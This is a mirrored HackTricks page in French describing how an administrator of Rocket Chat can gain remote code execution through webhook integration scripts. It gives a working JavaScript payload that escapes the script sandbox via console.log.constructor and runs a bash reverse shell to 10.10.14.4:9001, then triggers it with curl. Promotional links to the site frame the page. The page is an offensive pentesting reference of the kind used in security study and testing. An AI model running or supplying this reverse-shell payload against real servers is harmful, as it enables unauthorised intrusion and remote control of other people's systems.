mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
3.8 KiB
3.8 KiB
Rocket Chat
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
RCE
Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir un RCE.
- Allez dans
Integrationset sélectionnezNew Integrationet choisissez n'importe lequel :Incoming WebHookouOutgoing WebHook. /admin/integrations/incoming
- Selon la documentation, les deux utilisent ES2015 / ECMAScript 6 (essentiellement JavaScript) pour traiter les données. Alors, obtenons un shell inversé pour javascript comme :
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Configurez le WebHook (le canal et le nom d'utilisateur doivent exister) :
- Configurez le script WebHook :
- Sauvegardez les modifications
- Obtenez l'URL WebHook générée :
- Appelez-le avec curl et vous devriez recevoir le shell inversé
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.